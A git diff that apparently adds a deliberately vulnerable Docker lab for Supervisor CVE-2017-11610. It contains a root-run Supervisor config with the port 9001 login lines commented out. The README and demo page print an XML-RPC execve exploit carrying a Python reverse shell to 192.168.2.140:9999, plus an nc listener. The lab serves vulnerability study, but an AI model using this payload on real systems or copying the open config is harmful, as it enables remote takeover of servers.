diff --git a/README.md b/README.md index d1dcac2..6e91f3b 100644 --- a/README.md +++ b/README.md @@ -114,6 +114,7 @@ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-037 * [Spring Boot](./s/springboot/) * [Struts2](./s/struts2/) * [Spring WebFlow](./s/springwebflow/) +* [Supervisor](./s/supervisor/) ### [W](./w/)
diff --git a/s/README.md b/s/README.md index 8b52d62..79fa842 100644 --- a/s/README.md +++ b/s/README.md @@ -4,4 +4,5 @@ * [Shiro](./shiro/) * [Spring Boot](./springboot/) * [Struts2](./struts2/) -* [Spring WebFlow](./springwebflow/) \ No newline at end of file +* [Spring WebFlow](./springwebflow/) +* [Supervisor](./supervisor/) diff --git a/s/supervisor/1/Dockerfile b/s/supervisor/1/Dockerfile new file mode 100644 index 0000000..32081cc --- /dev/null +++ b/s/supervisor/1/Dockerfile @@ -0,0 +1,22 @@ +FROM debian:jessie +MAINTAINER Medici.Yan@Gmail.com +# RUN sed -i 's/deb.debian.org/mirrors.aliyun.com/g' /etc/apt/sources.list + +RUN set -x \ + && apt-get update \ + && apt-get install -y psmisc cron python python-pip \ + && pip install --upgrade pip \ + && pip install flask gunicorn supervisor==3.3.2 \ + && mkdir -p /htdocs/templates + +COPY src/app.py /htdocs/app.py +COPY src/index.html /htdocs/templates/index.html +COPY src/supervisor.conf /etc/supervisor.conf +COPY src/start.sh /start.sh +COPY src/daemon.sh /daemon.sh +COPY src/root /var/spool/cron/crontabs/root + +RUN chmod a+x /start.sh /daemon.sh \ + && rm -rf /var/lib/apt/lists + +CMD ["/start.sh"] diff --git a/s/supervisor/1/README.md b/s/supervisor/1/README.md new file mode 100644 index 0000000..fd5d0d3 --- /dev/null +++ b/s/supervisor/1/README.md @@ -0,0 +1,98 @@ +## Supervisor Authenticated Remote Code Execution(CVE-2017-11610) + +### 漏洞信息 + +Supervisor 是用 Python 开发的一套通用的进程管理程序,能将一个普通的命令行进程变为后台 daemon,并监控进程状态,异常退出时能自动重启。Supervisor可通过web接口管理服务,在配置了web接口后,同时会在服务器启动一个 XMLRPC 服务器,端口为 9001。该接口可配置需要密码访问,或者无需认证访问。 + +在获取该接口的访问权限后,远程攻击者可发送一段精心构造的请求,可在服务器执行任意代码。 + +### 影响版本 + +已经确认: + +* Supervisor 3.1.2 <= Version <= 3.3.2 + +### 镜像信息 + +类型 | 用户名 | 密码 +:-:|:-:|:-: +http://xxx/9001/RPC2 | vulapps | vulapps + +### 获取环境: + +1. 拉取镜像到本地 + + ``` +$ docker pull medicean/vulapps:s_supervisor_1 + ``` + +2. 启动环境 + + ``` +$ docker run -d -p 80:80 -p 9001:9001 medicean/vulapps:s_supervisor_1 + ``` + > `-p 80:80` 前面的 80 代表物理机的端口,可随意指定。 + + 访问 http://127.0.0.1:80 看到 web 界面即启动成功 + +#### Exp + +反弹 Shell + +> 假定启动后的环境如下: +> +> 攻击者 IP: 192.168.2.104 +> +> 受害者 IP: 192.168.2.100 + +1. 在攻击者机器上使用 nc 监听 + + ``` + $ nc -lvp 9999 + ``` + +2. 向受害者 9001 端口发送如下报文后即可 + +``` +POST http://192.168.2.100:9001/RPC2 HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: text/xml +Content-Type: text/xml +Accept-Language: en-GB,en;q=0.5 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +Content-Length: 638 +Host: 192.168.2.100:9001 + + + +supervisor.supervisord.options.execve + + +/usr/bin/python + + + + +python +-c +import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.140",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]); + + + + + + + + + +``` + +--- + +![](./exp.png) + +### 参考链接 + +* [SSD Advisory – Supervisor Authenticated Remote Code Execution](https://blogs.securiteam.com/index.php/archives/3348) +* [[CVE-2017-11610] RCE vulnerability report](https://github.com/Supervisor/supervisor/issues/964) diff --git a/s/supervisor/1/exp.png b/s/supervisor/1/exp.png new file mode 100644 index 0000000..5725b24 Binary files /dev/null and b/s/supervisor/1/exp.png differ diff --git a/s/supervisor/1/src/app.py b/s/supervisor/1/src/app.py new file mode 100644 index 0000000..9825232 --- /dev/null +++ b/s/supervisor/1/src/app.py @@ -0,0 +1,17 @@ +#!/usr/bin/env python +# coding:utf-8 + +from flask import Flask, request, render_template +app = Flask(__name__) + + +@app.route('/') +def index(): + headers = request.headers + host = headers.get('HOST', "127.0.0.1") + host = host.split(":")[0] + return render_template('index.html', host=host) + +if __name__ == '__main__': + app.debug = False + app.run(threaded=True, port=8800, host='0.0.0.0') diff --git a/s/supervisor/1/src/daemon.sh b/s/supervisor/1/src/daemon.sh new file mode 100644 index 0000000..03cb23c --- /dev/null +++ b/s/supervisor/1/src/daemon.sh @@ -0,0 +1,7 @@ +#!/bin/bash + +ps -A | grep supervisord +if [[ $? != 0 ]]; then + /usr/bin/killall gunicorn + /usr/local/bin/supervisord -c /etc/supervisor.conf +fi diff --git a/s/supervisor/1/src/index.html b/s/supervisor/1/src/index.html new file mode 100644 index 0000000..063f303 --- /dev/null +++ b/s/supervisor/1/src/index.html @@ -0,0 +1,364 @@ + + + + + + + + + + + + + + + + + +

CVE-2017-11610 VulApps Demo

+ +
+

Supervisor Authenticated Remote Code Execution

+
+ +
POST http://{{ host }}:9001/RPC2 HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/xml
+Content-Type: text/xml
+Accept-Language: en-GB,en;q=0.5
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+Content-Length: 638
+Host: {{ host }}:9001
+
+<?xml version="1.0"?>
+<methodCall>
+<methodName>supervisor.supervisord.options.execve</methodName>
+<params>
+<param>
+<string>/usr/bin/python</string>
+</param>
+<param>
+<array>
+<data>
+<value><string>python</string></value>
+<value><string>-c</string></value>
+<value><string>import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.140",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);</string></value>
+</data>
+</array>
+</param>
+<param>
+<struct>
+</struct>
+</param>
+</params>
+</methodCall>
+ +
+ +

See more at: VulApps

+ + + + + + + diff --git a/s/supervisor/1/src/root b/s/supervisor/1/src/root new file mode 100644 index 0000000..3eedb7a --- /dev/null +++ b/s/supervisor/1/src/root @@ -0,0 +1,28 @@ +# DO NOT EDIT THIS FILE - edit the master and reinstall. +# (/tmp/crontab.sDovLd/crontab installed on Thu Jul 27 13:24:42 2017) +# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $) +# Edit this file to introduce tasks to be run by cron. +# +# Each task to run has to be defined through a single line +# indicating with different fields when the task will be run +# and what command to run for the task +# +# To define the time you can provide concrete values for +# minute (m), hour (h), day of month (dom), month (mon), +# and day of week (dow) or use '*' in these fields (for 'any').# +# Notice that tasks will be started based on the cron's system +# daemon's notion of time and timezones. +# +# Output of the crontab jobs (including errors) is sent through +# email to the user the crontab file belongs to (unless redirected). +# +# For example, you can run a backup of all your user accounts +# at 5 a.m every week with: +# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/ +# +# For more information see the manual pages of crontab(5) and cron(8) +# +# m h dom mon dow command + +*/1 * * * * /daemon.sh + diff --git a/s/supervisor/1/src/start.sh b/s/supervisor/1/src/start.sh new file mode 100644 index 0000000..b686a82 --- /dev/null +++ b/s/supervisor/1/src/start.sh @@ -0,0 +1,4 @@ +#!/bin/bash +/usr/sbin/cron restart +/usr/local/bin/supervisord -c /etc/supervisor.conf +/usr/bin/tail -f /dev/null diff --git a/s/supervisor/1/src/supervisor.conf b/s/supervisor/1/src/supervisor.conf new file mode 100644 index 0000000..b6ecd2d --- /dev/null +++ b/s/supervisor/1/src/supervisor.conf @@ -0,0 +1,36 @@ +[unix_http_server] +file=/var/run/supervisor.sock ; (the path to the socket file) +;chmod=0700 ; socket file mode (default 0700) +;chown=nobody:nogroup ; socket file uid:gid owner +;username=vulapps ; (default is no username (open server)) +;password=vulapps ; (default is no password (open server)) + +[inet_http_server] ; inet (TCP) server disabled by default +port=*:9001 ; (ip_address:port specifier, *:port for all iface) +;username=vulapps ; (default is no username (open server)) +;password=vulapps ; (default is no password (open server)) + +[supervisord] +logfile=/var/log/supervisord.log ; (main log file;default $CWD/supervisord.log) +logfile_maxbytes=50MB ; (max main logfile bytes b4 rotation;default 50MB) +logfile_backups=10 ; (num of main logfile rotation backups;default 10) +loglevel=info ; (log level;default info; others: debug,warn,trace) +pidfile=/var/run/supervisord.pid ; (supervisord pidfile;default supervisord.pid) +nodaemon=false ; (start in foreground if true;default false) +minfds=1024 ; (min. avail startup file descriptors;default 1024) +minprocs=200 ; (min. avail process descriptors;default 200) +;umask=022 ; (process file creation umask;default 022) +user=root ; (default is current user, required if root) + +[rpcinterface:supervisor] +supervisor.rpcinterface_factory = supervisor.rpcinterface:make_main_rpcinterface + +[supervisorctl] +serverurl=unix:///var/run/supervisor.sock ; use a unix:// URL for a unix socket +;serverurl=http://*:9001 ; use an http:// url to specify an inet socket +;username=vulapps ; should be same as http_username if set +;password=vulapps ; should be same as http_password if set + +[program:web] +command=/usr/local/bin/gunicorn app:app -b 0.0.0.0:80 --log-level info --access-logfile /var/log/access.log +directory=/htdocs diff --git a/s/supervisor/README.md b/s/supervisor/README.md new file mode 100644 index 0000000..96fb16d --- /dev/null +++ b/s/supervisor/README.md @@ -0,0 +1,4 @@ +Supervisor +--- + +1. [Supervisor Authenticated Remote Code Execution(CVE-2017-11610)](./1)